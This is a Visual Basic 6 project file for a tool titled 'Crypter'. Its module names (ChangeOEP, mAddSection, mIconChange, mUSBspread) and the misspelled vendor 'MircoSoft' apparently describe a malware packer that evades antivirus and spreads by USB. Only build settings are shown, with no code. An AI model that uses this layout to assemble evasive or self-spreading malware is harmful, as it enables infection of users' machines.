Type=Exe
Form=Form1.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
Class=Class1; Class1.cls
Module=mAddSection; mAddSection.bas
Module=mRealign; mRealign.bas
Module=mIconChange; mod_icon.bas
Module=ChangeOEP; ChangeEP.bas
Module=mUSBspread; mUSBspread.bas
Module=mPatchTheme; mPatchTheme.bas
Module=Module1; Module1b.bas
Module=Module2; Modukjme2.bas
ResFile32="Crypter.res"
IconForm="Form1"
Startup="Form1"
HelpFile=""
Title="Crypter"
ExeName32="CrypterVista.exe"
Path32=".."
Command32=""
Name="Crypter"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="MircoSoft"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
